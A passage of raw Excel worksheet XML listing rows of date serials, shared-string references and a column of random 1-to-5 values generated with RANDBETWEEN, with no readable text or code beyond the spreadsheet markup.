        <v>6</v>
      </c>
      <c r="D11682" t="s">
        <v>25</v>
      </c>
      <c r="E11682" t="s">
        <v>10468</v>
      </c>
      <c r="F11682">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11683" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A11683" s="1">
        <v>43314.607395833336</v>
      </c>
      <c r="C11683" t="s">
        <v>993</v>
      </c>
      <c r="D11683" t="s">
        <v>271</v>
      </c>
      <c r="E11683" s="2" t="s">
        <v>10469</v>
      </c>
      <c r="F11683">
        <f t="shared" ca="1" si="182"/>
        <v>1</v>
      </c>
    </row>
    <row r="11684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11684" s="1">
        <v>43314.600462962961</v>
      </c>
      <c r="C11684" t="s">
        <v>10</v>
      </c>
      <c r="D11684" t="s">
        <v>80</v>
      </c>
      <c r="E11684" t="s">
        <v>10470</v>
      </c>
      <c r="F11684">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11685" s="1">
        <v>43314.576956018522</v>
      </c>
      <c r="C11685" t="s">
        <v>10</v>
      </c>
      <c r="E11685" t="s">
        <v>10471</v>
      </c>
      <c r="F11685">
        <f t="shared" ca="1" si="182"/>
        <v>5</v>
      </c>
    </row>
    <row r="11686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11686" s="1">
        <v>43314.576828703706</v>
      </c>
      <c r="C11686" t="s">
        <v>10</v>
      </c>
      <c r="E11686" t="s">
        <v>10471</v>
      </c>
      <c r="F11686">
        <f t="shared" ca="1" si="182"/>
        <v>4</v>
      </c>
    </row>
    <row r="11687" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11687" s="1">
        <v>43314.570277777777</v>
      </c>
      <c r="C11687" t="s">
        <v>10</v>
      </c>
      <c r="D11687" t="s">
        <v>23</v>
      </c>
      <c r="E11687" t="s">
        <v>10472</v>
      </c>
      <c r="F11687">
        <f t="shared" ca="1" si="182"/>
        <v>1</v>
      </c>
    </row>
    <row r="11688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11688" s="1">
        <v>43314.565520833334</v>
      </c>
      <c r="C11688" t="s">
        <v>10</v>
      </c>
      <c r="E11688" t="s">
        <v>10473</v>
      </c>
      <c r="F11688">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11689" s="1">
        <v>43314.558379629627</v>
      </c>
      <c r="C11689" t="s">
        <v>10</v>
      </c>
      <c r="D11689" t="s">
        <v>6</v>
      </c>
      <c r="E11689" t="s">
        <v>10474</v>
      </c>
      <c r="F11689">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11690" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A11690" s="1">
        <v>43314.526550925926</v>
      </c>
      <c r="C11690" t="s">
        <v>71</v>
      </c>
      <c r="D11690" t="s">
        <v>821</v>
      </c>
      <c r="E11690" s="2" t="s">
        <v>10475</v>
      </c>
      <c r="F11690">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11691" s="1">
        <v>43314.518518518518</v>
      </c>
      <c r="C11691" t="s">
        <v>10</v>
      </c>
      <c r="D11691" t="s">
        <v>192</v>
      </c>
      <c r="E11691" t="s">
        <v>10476</v>
      </c>
      <c r="F11691">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11692" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11692" s="1">
        <v>43314.489016203705</v>
      </c>
      <c r="C11692" t="s">
        <v>10</v>
      </c>
      <c r="D11692" t="s">
        <v>6</v>
      </c>
      <c r="E11692" s="2" t="s">
        <v>10477</v>
      </c>
      <c r="F11692">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11693" s="1">
        <v>43314.48165509259</v>
      </c>
      <c r="C11693" t="s">
        <v>6</v>
      </c>
      <c r="D11693" t="s">
        <v>194</v>
      </c>
      <c r="E11693" t="s">
        <v>10478</v>
      </c>
      <c r="F11693">
        <f t="shared" ca="1" si="182"/>
        <v>4</v>
      </c>
    </row>
    <row r="11694" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11694" s="1">
        <v>43314.480694444443</v>
      </c>
      <c r="C11694" t="s">
        <v>10</v>
      </c>
      <c r="D11694" t="s">
        <v>33</v>
      </c>
      <c r="E11694" s="2" t="s">
        <v>10479</v>
      </c>
      <c r="F11694">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11695" s="1">
        <v>43314.457407407404</v>
      </c>
      <c r="C11695" t="s">
        <v>48</v>
      </c>
      <c r="E11695" t="s">
        <v>10480</v>
      </c>
      <c r="F11695">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11696" s="1">
        <v>43314.450023148151</v>
      </c>
      <c r="C11696" t="s">
        <v>10</v>
      </c>
      <c r="D11696" t="s">
        <v>89</v>
      </c>
      <c r="E11696" t="s">
        <v>10481</v>
      </c>
      <c r="F11696">
        <f t="shared" ca="1" si="182"/>
        <v>1</v>
      </c>
    </row>
    <row r="11697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11697" s="1">
        <v>43314.434999999998</v>
      </c>
      <c r="C11697" t="s">
        <v>48</v>
      </c>
      <c r="E11697" t="s">
        <v>10482</v>
      </c>
      <c r="F11697">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11698" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A11698" s="1">
        <v>43314.425879629627</v>
      </c>
      <c r="C11698" t="s">
        <v>65</v>
      </c>
      <c r="E11698" s="2" t="s">
        <v>10483</v>
      </c>
      <c r="F11698">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11699" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11699" s="1">
        <v>43314.41196759259</v>
      </c>
      <c r="C11699" t="s">
        <v>71</v>
      </c>
      <c r="E11699" s="2" t="s">
        <v>10484</v>
      </c>
      <c r="F11699">
        <f t="shared" ca="1" si="182"/>
        <v>4</v>
      </c>
    </row>
    <row r="11700" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A11700" s="1">
        <v>43314.408194444448</v>
      </c>
      <c r="C11700" t="s">
        <v>10</v>
      </c>
      <c r="D11700" t="s">
        <v>20</v>
      </c>
      <c r="E11700" s="2" t="s">
        <v>10485</v>
      </c>
      <c r="F11700">
        <f t="shared" ca="1" si="182"/>
        <v>5</v>
      </c>
    </row>
    <row r="11701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11701" s="1">
        <v>43314.404317129629</v>
      </c>
      <c r="C11701" t="s">
        <v>10</v>
      </c>
      <c r="D11701" t="s">
        <v>494</v>
      </c>
      <c r="E11701" t="s">
        <v>10486</v>
      </c>
      <c r="F11701">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11702" s="1">
        <v>43314.356990740744</v>
      </c>
      <c r="C11702" t="s">
        <v>50</v>
      </c>
      <c r="E11702" t="s">
        <v>10487</v>
      </c>
      <c r="F11702">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11703" s="1">
        <v>43314.347326388888</v>
      </c>
      <c r="C11703" t="s">
        <v>48</v>
      </c>
      <c r="E11703" t="s">
        <v>10488</v>
      </c>
      <c r="F11703">
        <f t="shared" ca="1" si="182"/>
        <v>1</v>
      </c>
    </row>
    <row r="11704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11704" s="1">
        <v>43314.343136574076</v>
      </c>
      <c r="C11704" t="s">
        <v>10</v>
      </c>
      <c r="D11704" t="s">
        <v>36</v>
      </c>
      <c r="E11704" t="s">
        <v>10489</v>
      </c>
      <c r="F11704">
        <f t="shared" ca="1" si="182"/>
        <v>5</v>
      </c>
    </row>
    <row r="11705" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A11705" s="1">
        <v>43314.342766203707</v>
      </c>
      <c r="C11705" t="s">
        <v>48</v>
      </c>
      <c r="E11705" s="2" t="s">
        <v>10490</v>
      </c>
      <c r="F11705">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11706" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A11706" s="1">
        <v>43314.297013888892</v>
      </c>
      <c r="C11706" t="s">
        <v>48</v>
      </c>
      <c r="E11706" s="2" t="s">
        <v>10491</v>
      </c>
      <c r="F11706">
        <f t="shared" ca="1" si="182"/>
        <v>1</v>
      </c>
    </row>
    <row r="11707" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A11707" s="1">
        <v>43314.295717592591</v>
      </c>
      <c r="C11707" t="s">
        <v>71</v>
      </c>
      <c r="E11707" s="2" t="s">
        <v>10492</v>
      </c>
      <c r="F11707">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11708" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11708" s="1">
        <v>43314.265127314815</v>
      </c>
      <c r="C11708" t="s">
        <v>10</v>
      </c>
      <c r="D11708" t="s">
        <v>11</v>
      </c>
      <c r="E11708" s="2" t="s">
        <v>10493</v>
      </c>
      <c r="F11708">
        <f t="shared" ca="1" si="182"/>
        <v>5</v>
      </c>
    </row>
    <row r="11709" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11709" s="1">
        <v>43314.248240740744</v>
      </c>
      <c r="C11709" t="s">
        <v>73</v>
      </c>
      <c r="E11709" s="2" t="s">
        <v>10494</v>
      </c>
      <c r="F11709">
        <f t="shared" ca="1" si="182"/>
        <v>1</v>
      </c>
    </row>
    <row r="11710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11710" s="1">
        <v>43314.246331018519</v>
      </c>
      <c r="C11710" t="s">
        <v>253</v>
      </c>
      <c r="D11710" t="s">
        <v>112</v>
      </c>
      <c r="E11710" t="s">
        <v>8504</v>
      </c>
      <c r="F11710">
        <f t="shared" ca="1" si="182"/>
        <v>4</v>
      </c>
    </row>
    <row r="11711" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A11711" s="1">
        <v>43314.24113425926</v>
      </c>
      <c r="C11711" t="s">
        <v>993</v>
      </c>
      <c r="D11711" t="s">
        <v>25</v>
      </c>
      <c r="E11711" s="2" t="s">
        <v>10495</v>
      </c>
      <c r="F11711">
        <f t="shared" ca="1" si="182"/>
        <v>2</v>
      </c>
    </row>
    <row r="11712" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A11712" s="1">
        <v>43314.216643518521</v>
      </c>
      <c r="C11712" t="s">
        <v>1080</v>
      </c>
      <c r="E11712" s="2" t="s">
        <v>10496</v>
      </c>
      <c r="F11712">
        <f t="shared" ca="1" si="182"/>
        <v>4</v>
      </c>
    </row>
    <row r="11713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11713" s="1">
        <v>43314.17728009259</v>
      </c>
      <c r="C11713" t="s">
        <v>48</v>
      </c>
      <c r="E11713" t="s">
        <v>10497</v>
      </c>
      <c r="F11713">
        <f t="shared" ca="1" si="182"/>
        <v>3</v>
      </c>
    </row>
    <row r="11714" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A11714" s="1">
        <v>43314.173194444447</v>
      </c>
      <c r="C11714" t="s">
        <v>71</v>
      </c>
      <c r="D11714" t="s">
        <v>86</v>
      </c>
      <c r="E11714" s="2" t="s">
        <v>10498</v>
      </c>
      <c r="F11714">
        <f t="shared" ref="F11714:F11777" ca="1" si="183">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="11715" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A11715" s="1">
        <v>43314.163437499999</v>
      </c>
      <c r="C11715" t="s">
        <v>7419</v>
      </c>
      <c r="E11715" s="2" t="s">
        <v>9050</v>
      </c>
      <c r="F11715">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11716" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11716" s="1">
        <v>43314.144259259258</v>
      </c>
      <c r="C11716" t="s">
        <v>65</v>
      </c>
      <c r="E11716" s="2" t="s">
        <v>10499</v>
      </c>
      <c r="F11716">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11717" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11717" s="1">
        <v>43314.127175925925</v>
      </c>
      <c r="C11717" t="s">
        <v>197</v>
      </c>
      <c r="E11717" s="2" t="s">
        <v>10500</v>
      </c>
      <c r="F11717">
        <f t="shared" ca="1" si="183"/>
        <v>3</v>
      </c>
    </row>
    <row r="11718" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11718" s="1">
        <v>43314.066307870373</v>
      </c>
      <c r="C11718" t="s">
        <v>1688</v>
      </c>
      <c r="D11718" t="s">
        <v>67</v>
      </c>
      <c r="E11718" s="2" t="s">
        <v>10501</v>
      </c>
      <c r="F11718">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11719" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A11719" s="1">
        <v>43314.056701388887</v>
      </c>
      <c r="C11719" t="s">
        <v>29</v>
      </c>
      <c r="D11719" t="s">
        <v>94</v>
      </c>
      <c r="E11719" s="2" t="s">
        <v>10502</v>
      </c>
      <c r="F11719">
        <f t="shared" ca="1" si="183"/>
        <v>3</v>
      </c>
    </row>
    <row r="11720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11720" s="1">
        <v>43314.02175925926</v>
      </c>
      <c r="C11720" t="s">
        <v>3106</v>
      </c>
      <c r="D11720" t="s">
        <v>163</v>
      </c>
      <c r="E11720" t="s">
        <v>10503</v>
      </c>
      <c r="F11720">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11721" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11721" s="1">
        <v>43314.010474537034</v>
      </c>
      <c r="C11721" t="s">
        <v>140</v>
      </c>
      <c r="D11721" t="s">
        <v>141</v>
      </c>
      <c r="E11721" s="2" t="s">
        <v>10504</v>
      </c>
      <c r="F11721">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11722" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A11722" s="1">
        <v>43313.944155092591</v>
      </c>
      <c r="C11722" t="s">
        <v>565</v>
      </c>
      <c r="D11722" t="s">
        <v>107</v>
      </c>
      <c r="E11722" s="2" t="s">
        <v>10505</v>
      </c>
      <c r="F11722">
        <f t="shared" ca="1" si="183"/>
        <v>3</v>
      </c>
    </row>
    <row r="11723" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A11723" s="1">
        <v>43313.925370370373</v>
      </c>
      <c r="C11723" t="s">
        <v>118</v>
      </c>
      <c r="D11723" t="s">
        <v>25</v>
      </c>
      <c r="E11723" s="2" t="s">
        <v>10506</v>
      </c>
      <c r="F11723">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11724" s="1">
        <v>43313.901585648149</v>
      </c>
      <c r="C11724" t="s">
        <v>2156</v>
      </c>
      <c r="D11724" t="s">
        <v>158</v>
      </c>
      <c r="E11724" t="s">
        <v>10507</v>
      </c>
      <c r="F11724">
        <f t="shared" ca="1" si="183"/>
        <v>1</v>
      </c>
    </row>
    <row r="11725" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A11725" s="1">
        <v>43313.88590277778</v>
      </c>
      <c r="C11725" t="s">
        <v>993</v>
      </c>
      <c r="D11725" t="s">
        <v>602</v>
      </c>
      <c r="E11725" s="2" t="s">
        <v>10508</v>
      </c>
      <c r="F11725">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11726" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A11726" s="1">
        <v>43313.877476851849</v>
      </c>
      <c r="C11726" t="s">
        <v>6019</v>
      </c>
      <c r="D11726" t="s">
        <v>381</v>
      </c>
      <c r="E11726" s="2" t="s">
        <v>10509</v>
      </c>
      <c r="F11726">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11727" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A11727" s="1">
        <v>43313.859513888892</v>
      </c>
      <c r="C11727" t="s">
        <v>993</v>
      </c>
      <c r="D11727" t="s">
        <v>94</v>
      </c>
      <c r="E11727" s="2" t="s">
        <v>10510</v>
      </c>
      <c r="F11727">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11728" s="1">
        <v>43313.830046296294</v>
      </c>
      <c r="C11728" t="s">
        <v>140</v>
      </c>
      <c r="D11728" t="s">
        <v>141</v>
      </c>
      <c r="E11728" t="s">
        <v>10511</v>
      </c>
      <c r="F11728">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11729" s="1">
        <v>43313.783912037034</v>
      </c>
      <c r="C11729" t="s">
        <v>10</v>
      </c>
      <c r="D11729" t="s">
        <v>374</v>
      </c>
      <c r="E11729" t="s">
        <v>10512</v>
      </c>
      <c r="F11729">
        <f t="shared" ca="1" si="183"/>
        <v>3</v>
      </c>
    </row>
    <row r="11730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11730" s="1">
        <v>43313.745219907411</v>
      </c>
      <c r="C11730" t="s">
        <v>10</v>
      </c>
      <c r="D11730" t="s">
        <v>6</v>
      </c>
      <c r="E11730" t="s">
        <v>10513</v>
      </c>
      <c r="F11730">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11731" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A11731" s="1">
        <v>43313.725312499999</v>
      </c>
      <c r="C11731" t="s">
        <v>471</v>
      </c>
      <c r="D11731" t="s">
        <v>312</v>
      </c>
      <c r="E11731" s="2" t="s">
        <v>10514</v>
      </c>
      <c r="F11731">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11732" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11732" s="1">
        <v>43313.72042824074</v>
      </c>
      <c r="C11732" t="s">
        <v>10</v>
      </c>
      <c r="D11732" t="s">
        <v>107</v>
      </c>
      <c r="E11732" s="2" t="s">
        <v>10515</v>
      </c>
      <c r="F11732">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11733" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11733" s="1">
        <v>43313.698182870372</v>
      </c>
      <c r="C11733" t="s">
        <v>10</v>
      </c>
      <c r="D11733" t="s">
        <v>178</v>
      </c>
      <c r="E11733" s="2" t="s">
        <v>10516</v>
      </c>
      <c r="F11733">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11734" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11734" s="1">
        <v>43313.686840277776</v>
      </c>
      <c r="C11734" t="s">
        <v>4060</v>
      </c>
      <c r="D11734" t="s">
        <v>194</v>
      </c>
      <c r="E11734" t="s">
        <v>10517</v>
      </c>
      <c r="F11734">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11735" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11735" s="1">
        <v>43313.685601851852</v>
      </c>
      <c r="C11735" t="s">
        <v>6</v>
      </c>
      <c r="D11735" t="s">
        <v>821</v>
      </c>
      <c r="E11735" s="2" t="s">
        <v>10518</v>
      </c>
      <c r="F11735">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11736" s="1">
        <v>43313.677719907406</v>
      </c>
      <c r="C11736" t="s">
        <v>10</v>
      </c>
      <c r="D11736" t="s">
        <v>52</v>
      </c>
      <c r="E11736" t="s">
        <v>10519</v>
      </c>
      <c r="F11736">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11737" s="1">
        <v>43313.669386574074</v>
      </c>
      <c r="C11737" t="s">
        <v>10</v>
      </c>
      <c r="D11737" t="s">
        <v>271</v>
      </c>
      <c r="E11737" t="s">
        <v>10520</v>
      </c>
      <c r="F11737">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11738" s="1">
        <v>43313.647800925923</v>
      </c>
      <c r="C11738" t="s">
        <v>10</v>
      </c>
      <c r="D11738" t="s">
        <v>46</v>
      </c>
      <c r="E11738" t="s">
        <v>10521</v>
      </c>
      <c r="F11738">
        <f t="shared" ca="1" si="183"/>
        <v>1</v>
      </c>
    </row>
    <row r="11739" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11739" s="1">
        <v>43313.641076388885</v>
      </c>
      <c r="C11739" t="s">
        <v>10</v>
      </c>
      <c r="D11739" t="s">
        <v>20</v>
      </c>
      <c r="E11739" s="2" t="s">
        <v>10522</v>
      </c>
      <c r="F11739">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11740" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11740" s="1">
        <v>43313.637974537036</v>
      </c>
      <c r="C11740" t="s">
        <v>10</v>
      </c>
      <c r="D11740" t="s">
        <v>11</v>
      </c>
      <c r="E11740" t="s">
        <v>10523</v>
      </c>
      <c r="F11740">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11741" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11741" s="1">
        <v>43313.626446759263</v>
      </c>
      <c r="C11741" t="s">
        <v>6</v>
      </c>
      <c r="D11741" t="s">
        <v>114</v>
      </c>
      <c r="E11741" s="2" t="s">
        <v>10524</v>
      </c>
      <c r="F11741">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11742" s="1">
        <v>43313.614814814813</v>
      </c>
      <c r="C11742" t="s">
        <v>10</v>
      </c>
      <c r="D11742" t="s">
        <v>6</v>
      </c>
      <c r="E11742" t="s">
        <v>10525</v>
      </c>
      <c r="F11742">
        <f t="shared" ca="1" si="183"/>
        <v>3</v>
      </c>
    </row>
    <row r="11743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11743" s="1">
        <v>43313.610532407409</v>
      </c>
      <c r="C11743" t="s">
        <v>60</v>
      </c>
      <c r="E11743" t="s">
        <v>10526</v>
      </c>
      <c r="F11743">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11744" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11744" s="1">
        <v>43313.603634259256</v>
      </c>
      <c r="C11744" t="s">
        <v>10</v>
      </c>
      <c r="D11744" t="s">
        <v>244</v>
      </c>
      <c r="E11744" t="s">
        <v>10527</v>
      </c>
      <c r="F11744">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11745" s="1">
        <v>43313.593761574077</v>
      </c>
      <c r="C11745" t="s">
        <v>3106</v>
      </c>
      <c r="D11745" t="s">
        <v>178</v>
      </c>
      <c r="E11745" t="s">
        <v>10528</v>
      </c>
      <c r="F11745">
        <f t="shared" ca="1" si="183"/>
        <v>5</v>
      </c>
    </row>
    <row r="11746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11746" s="1">
        <v>43313.563402777778</v>
      </c>
      <c r="C11746" t="s">
        <v>41</v>
      </c>
      <c r="E11746" t="s">
        <v>10529</v>
      </c>
      <c r="F11746">
        <f t="shared" ca="1" si="183"/>
        <v>3</v>
      </c>
    </row>
    <row r="11747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11747" s="1">
        <v>43313.545682870368</v>
      </c>
      <c r="C11747" t="s">
        <v>10</v>
      </c>
      <c r="D11747" t="s">
        <v>107</v>
      </c>
      <c r="E11747" t="s">
        <v>10530</v>
      </c>
      <c r="F11747">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11748" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11748" s="1">
        <v>43313.526631944442</v>
      </c>
      <c r="C11748" t="s">
        <v>10</v>
      </c>
      <c r="D11748" t="s">
        <v>46</v>
      </c>
      <c r="E11748" t="s">
        <v>10531</v>
      </c>
      <c r="F11748">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11749" s="1">
        <v>43313.525011574071</v>
      </c>
      <c r="C11749" t="s">
        <v>10</v>
      </c>
      <c r="D11749" t="s">
        <v>112</v>
      </c>
      <c r="E11749" t="s">
        <v>10532</v>
      </c>
      <c r="F11749">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11750" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11750" s="1">
        <v>43313.522361111114</v>
      </c>
      <c r="C11750" t="s">
        <v>731</v>
      </c>
      <c r="E11750" t="s">
        <v>10533</v>
      </c>
      <c r="F11750">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11751" s="1">
        <v>43313.508819444447</v>
      </c>
      <c r="C11751" t="s">
        <v>48</v>
      </c>
      <c r="E11751" t="s">
        <v>10534</v>
      </c>
      <c r="F11751">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11752" s="1">
        <v>43313.507395833331</v>
      </c>
      <c r="C11752" t="s">
        <v>10</v>
      </c>
      <c r="D11752" t="s">
        <v>56</v>
      </c>
      <c r="E11752" t="s">
        <v>10535</v>
      </c>
      <c r="F11752">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11753" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A11753" s="1">
        <v>43313.501701388886</v>
      </c>
      <c r="C11753" t="s">
        <v>10</v>
      </c>
      <c r="D11753" t="s">
        <v>20</v>
      </c>
      <c r="E11753" s="2" t="s">
        <v>10536</v>
      </c>
      <c r="F11753">
        <f t="shared" ca="1" si="183"/>
        <v>3</v>
      </c>
    </row>
    <row r="11754" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11754" s="1">
        <v>43313.479375000003</v>
      </c>
      <c r="C11754" t="s">
        <v>41</v>
      </c>
      <c r="E11754" t="s">
        <v>10537</v>
      </c>
      <c r="F11754">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11755" s="1">
        <v>43313.469722222224</v>
      </c>
      <c r="C11755" t="s">
        <v>6</v>
      </c>
      <c r="D11755" t="s">
        <v>25</v>
      </c>
      <c r="E11755" t="s">
        <v>10538</v>
      </c>
      <c r="F11755">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11756" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11756" s="1">
        <v>43313.441099537034</v>
      </c>
      <c r="C11756" t="s">
        <v>73</v>
      </c>
      <c r="E11756" t="s">
        <v>10539</v>
      </c>
      <c r="F11756">
        <f t="shared" ca="1" si="183"/>
        <v>4</v>
      </c>
    </row>
    <row r="11757" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A11757" s="1">
        <v>43313.410636574074</v>
      </c>
      <c r="C11757" t="s">
        <v>3049</v>
      </c>
      <c r="E11757" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F11757">
        <f t="shared" ca="1" si="183"/>
        <v>1</v>
      </c>
    </row>
    <row r="11758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11758" s="1">
        <v>43313.405416666668</v>
      </c>
      <c r="C11758" t="s">
        <v>48</v>
      </c>
      <c r="E11758" t="s">
        <v>10540</v>
      </c>
      <c r="F11758">
        <f t="shared" ca="1" si="183"/>
        <v>2</v>
      </c>
    </row>
    <row r="11759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11759" s="1">
        <v>43313.402557870373</v>
      </c>
      <c r="C11759" t="s">
        <v>10</v>
      </c>
      <c r="D11759" t="s">
        <v>192</v>
      </c>
      <c r="E11759" t="s">
